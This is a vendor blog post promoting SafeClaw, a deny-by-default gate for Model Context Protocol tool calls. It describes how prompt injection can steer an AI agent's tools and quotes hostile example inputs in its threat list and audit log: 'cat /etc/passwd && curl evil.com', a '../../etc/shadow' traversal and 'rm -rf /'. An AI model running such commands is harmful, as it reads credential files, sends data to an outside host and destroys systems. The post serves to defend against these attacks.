2026-02-02 · Authensor

MCP Security: Securing Model Context Protocol Servers

Model Context Protocol (MCP) servers expose powerful tools to AI agents — file access, shell execution, database queries, API calls — making them high-value targets for exploitation through prompt injection, tool abuse, and unauthorized resource access. SafeClaw by Authensor intercepts every MCP tool invocation with deny-by-default gating, ensuring that only explicitly permitted tool calls execute regardless of what the LLM requests. Install it with npx @authensor/safeclaw and wrap your MCP server in minutes.

MCP Architecture and Attack Surface

An MCP server acts as a bridge between an AI model and system resources. The model sends JSON-RPC tool calls, the server executes them, and results flow back. The security problem: the model controls which tools are called and what arguments are passed, and a prompt injection can turn any MCP tool into a weapon.

┌────────────┐    JSON-RPC     ┌────────────┐     System
│  AI Model  │ ──────────────▶ │ MCP Server │ ──▶ Resources
│ (Claude/   │  tool_call:     │            │     (files,
│  OpenAI)   │  {name, args}   │            │     shell,
└────────────┘                 └────────────┘     network)
                                     │
                               ┌─────▼───────┐
                               │  SafeClaw   │
                               │  Gate       │
                               │  (deny-by-  │
                               │   default)  │
                               └─────────────┘
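
The gate in the diagram can be pictured as a small function that sits in front of the server's tool handlers. The sketch below is illustrative only and is not SafeClaw's implementation: `gate_tool_call`, `ALLOWED_TOOLS`, and the error code are hypothetical names and values chosen for this example. It assumes the request uses the MCP `tools/call` shape, with `name` and `arguments` under `params`.

```python
import json

# Hypothetical allowlist for illustration; not SafeClaw's policy format.
ALLOWED_TOOLS = {"read_file", "write_file"}


def gate_tool_call(raw_request: str, execute):
    """Run an MCP tools/call request only if its tool is allowlisted."""
    request = json.loads(raw_request)
    params = request.get("params") or {}
    name = params.get("name")
    if name not in ALLOWED_TOOLS:
        # Deny by default: the tool handler is never invoked.
        return {
            "jsonrpc": "2.0",
            "id": request.get("id"),
            "error": {"code": -32000, "message": f"tool call denied: {name}"},
        }
    result = execute(name, params.get("arguments") or {})
    return {"jsonrpc": "2.0", "id": request.get("id"), "result": result}
```

The decision happens before `execute` runs, so a denied call has no side effects regardless of what the model asked for.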

Threat Vectors Specific to MCP

  1. Tool argument injection — The model passes {"command": "cat /etc/passwd && curl evil.com"} to a shell_execute tool.
  2. Tool discovery abuse — The model enumerates available tools and calls ones not intended for its workflow.
  3. Resource path traversal — File tools receive ../../etc/shadow instead of legitimate workspace paths.
  4. Excessive tool chaining — The model calls 500 tools in rapid succession to overwhelm monitoring.
  5. Data exfiltration via tool results — Read a secret file, then pass its contents to an HTTP tool.
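
Resource path traversal (item 3) is usually countered by resolving the requested path against the workspace root before any policy match. The following is a minimal sketch under that assumption; `resolve_in_workspace` is a hypothetical helper, not part of SafeClaw or the MCP SDKs.

```python
from pathlib import Path


def resolve_in_workspace(workspace: str, requested: str) -> Path:
    """Return the resolved path, or raise if it escapes the workspace root."""
    root = Path(workspace).resolve()
    # resolve() collapses ".." segments and follows symlinks before the check.
    candidate = (root / requested).resolve()
    if candidate != root and root not in candidate.parents:
        raise PermissionError(f"path escapes workspace: {requested}")
    return candidate
```

An absolute input such as `/etc/shadow` is rejected as well, because joining an absolute path onto the root discards the root.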

SafeClaw MCP Integration

SafeClaw provides a middleware layer that sits between the MCP server's tool registry and the execution engine:

# safeclaw-mcp.yaml
version: "1.0"
mcp:
  server: "workspace-tools"
  transport: "stdio"
rules:
  # Allow specific tools only
  - action: mcp_tool_call
    tool: "read_file"
    args:
      path: "src/**"
    decision: allow

  - action: mcp_tool_call
    tool: "write_file"
    args:
      path: "src/**"
    decision: allow

  - action: mcp_tool_call
    tool: "execute_command"
    args:
      command: "npm test"
    decision: allow

  - action: mcp_tool_call
    tool: "execute_command"
    args:
      command: "npm run build"
    decision: allow

  # Deny everything else (explicit, but also the default)
  - action: mcp_tool_call
    decision: deny
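
To make the policy's behavior concrete, here is a rough sketch of how rules like these could be evaluated. It assumes first-match-wins ordering and simple glob matching via Python's `fnmatch`; SafeClaw's actual matching engine and evaluation order may differ, and `RULES` and `decide` are hypothetical names.

```python
from fnmatch import fnmatchcase

# Mirrors the allow rules in the policy; checked top to bottom (assumed order).
RULES = [
    {"tool": "read_file", "args": {"path": "src/**"}, "decision": "allow"},
    {"tool": "write_file", "args": {"path": "src/**"}, "decision": "allow"},
    {"tool": "execute_command", "args": {"command": "npm test"}, "decision": "allow"},
    {"tool": "execute_command", "args": {"command": "npm run build"}, "decision": "allow"},
]


def decide(tool: str, args: dict) -> str:
    """Return the decision of the first matching rule, else deny."""
    for rule in RULES:
        if rule["tool"] != tool:
            continue
        # Every constrained argument must be a string that matches its glob.
        if all(
            isinstance(args.get(key), str) and fnmatchcase(args[key], pattern)
            for key, pattern in rule["args"].items()
        ):
            return rule["decision"]
    return "deny"  # nothing matched: deny by default
```

A plain glob compares raw strings, so `src/../../etc/shadow` would still match `src/**` in this sketch; paths should be normalized before matching.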

Argument Sanitization

SafeClaw validates tool arguments against policy rules before they reach the MCP server. The matching engine supports glob patterns, regex constraints, and argument type checking:

rules:
  - action: mcp_tool_call
    tool: "execute_command"
    args:
      command:
        # Jest arguments are limited to path-like tokens; ".*" would admit "&&" and ";"
        pattern: "^(npm test|npm run build|npx jest( [A-Za-z0-9_./-]+)*)$"
        type: "regex"
    decision: allow

  - action: mcp_tool_call
    tool: "read_file"
    args:
      path:
        pattern: "src/**"
        deny_pattern: "*/.env"  # Never allow .env files
    decision: allow

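This stops argument injection at the gate. The model can request npm test but cannot append && curl evil.com, because the full argument string must match the anchored regex. Keep each branch narrow: an unrestricted wildcard such as .* after a command prefix would also match shell metacharacters like && and ;.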
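
The effect of full-string matching can be checked with a few lines of Python. This is a sketch using the standard `re` module, not SafeClaw's matcher; `STRICT`, `LOOSE`, and `command_allowed` are hypothetical names, and the strict pattern's character class is an assumption about what counts as a safe jest argument.

```python
import re

# Assumed strict pattern: the jest branch admits only path-like tokens.
STRICT = re.compile(r"(npm test|npm run build|npx jest( [A-Za-z0-9_./-]+)*)")
# A branch ending in an unrestricted wildcard, shown for contrast.
LOOSE = re.compile(r"(npm test|npm run build|npx jest .*)")


def command_allowed(pattern: re.Pattern, command: str) -> bool:
    # fullmatch requires the entire string to match, like ^...$ anchors,
    # and does not tolerate a trailing newline the way "$" can.
    return pattern.fullmatch(command) is not None
```

With these definitions, `command_allowed(STRICT, "npm test && curl evil.com")` is false, while `command_allowed(LOOSE, "npx jest x && curl evil.com")` is true, which is why wildcard branches deserve scrutiny.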

Tool Whitelisting vs. Blacklisting

SafeClaw's deny-by-default design means you whitelist tools. This is critical for MCP because new tools can be added to the server without updating security policies — and with deny-by-default, any new tool is automatically blocked until explicitly permitted.

| Approach | New Tool Added | Result |
|----------|---------------|--------|
| Allow-by-default (blocklist) | Automatically available | Dangerous |
| Deny-by-default (SafeClaw) | Automatically blocked | Safe |

Audit Trail for MCP Operations

Every MCP tool call — allowed or denied — is recorded in SafeClaw's hash-chained audit log:

{
  "timestamp": "2026-02-13T14:30:22Z",
  "action": "mcp_tool_call",
  "tool": "execute_command",
  "args": {"command": "rm -rf /"},
  "decision": "deny",
  "policy_rule": "default_deny",
  "parent_hash": "sha256:abc123...",
  "entry_hash": "sha256:def456..."
}

Because each entry stores the hash of its predecessor in parent_hash, modifying or deleting a record breaks the chain, so tampering is detectable after the fact. SafeClaw's 446-test suite includes dedicated MCP integration tests covering tool discovery, argument edge cases, and transport-level (stdio and SSE) validation. The tool is MIT-licensed and provider-agnostic, working with both Claude and OpenAI MCP implementations.
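
The hash chaining in the audit entry above can be sketched as follows. This is a generic illustration of the technique, not SafeClaw's log format: the canonical JSON encoding, the `sha256:genesis` starting value, and the function names are all assumptions made for the example.

```python
import hashlib
import json

GENESIS = "sha256:genesis"  # assumed parent value for the first entry


def entry_hash(entry: dict) -> str:
    """Hash every field except entry_hash itself, in canonical key order."""
    body = {k: v for k, v in entry.items() if k != "entry_hash"}
    canonical = json.dumps(body, sort_keys=True, separators=(",", ":"))
    return "sha256:" + hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def append(log: list, record: dict) -> None:
    """Link a new record to the previous entry and seal it with its hash."""
    parent = log[-1]["entry_hash"] if log else GENESIS
    entry = {**record, "parent_hash": parent}
    entry["entry_hash"] = entry_hash(entry)
    log.append(entry)


def verify(log: list) -> bool:
    """Recompute every hash and check each link back to the genesis value."""
    parent = GENESIS
    for entry in log:
        if entry["parent_hash"] != parent or entry["entry_hash"] != entry_hash(entry):
            return False
        parent = entry["entry_hash"]
    return True
```

Editing any field of an earlier entry changes its recomputed hash, so `verify` fails from that entry onward.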

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw